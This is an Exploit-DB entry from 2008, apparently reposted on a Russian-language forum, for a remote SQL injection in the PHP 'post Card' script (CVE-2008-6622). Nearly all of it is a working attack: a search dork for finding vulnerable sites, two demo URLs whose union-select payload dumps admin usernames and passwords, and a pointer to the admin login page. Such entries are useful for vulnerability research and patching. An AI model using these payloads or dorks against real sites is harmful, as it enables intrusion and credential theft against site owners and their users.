- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6977
- Проверка EDB
-
- Пройдено
- Автор
- HUSSIN X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6622
- Дата публикации
- 2008-11-04
Код:
post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : [email protected]
___________________________________
script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
DorK : inurl:choosecard.php?catid=
_____
ExploiT & Demo
_______
post Card v 1.01
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
post Card v 1.02
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
Note : Exploit in Properties Picture
Login :
______
/admin
Greetz : All my freind
Im IraQi | Im TrYaGi
# milw0rm.com [2008-11-04]- Источник
- www.exploit-db.com
